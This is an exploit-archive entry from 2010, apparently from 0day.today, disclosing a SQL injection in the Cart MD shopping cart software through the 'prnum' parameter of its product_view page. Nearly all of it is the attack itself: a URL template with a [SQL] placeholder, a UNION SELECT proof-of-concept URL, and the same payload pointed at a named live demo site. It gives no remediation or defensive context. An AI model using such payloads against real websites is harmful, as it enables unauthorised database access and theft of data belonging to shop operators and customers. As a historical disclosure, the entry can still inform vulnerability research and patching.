id: 14122
date: 09/20/2010
title: Cart MD SQL Injection Vulnerability
author: S4n470n
cves: 

===================================
Cart MD SQL Injection Vulnerability
===================================

#########################################################################
#
# Exploit Title : Cart MD SQL Injection Vulnerability
# Author        : S4n470n
# Contact       : S4n470n@hotmail.com , S4n470n@yahoo.com
#
###################################################################
#
# Exploit :
# http://www.Target.com/index.php?page=product_view&prnum=[SQL]
#
# POC     :
# http://www.Target.com/index.php?page=product_view&prnum=1+UNION+SELECT+1--
#
# Demo    :
# http://v4.demo.cartmd.com/index.php?page=product_view&prnum=1+UNION+SELECT+1--
#
####################################################################
#
# S4n470n , S4n470n@hotmail.com , S4n470n@yahoo.com
# Special Thanks To All Iranian Hackers
#
####################################################################



#  0day.today [2023-03-24]  #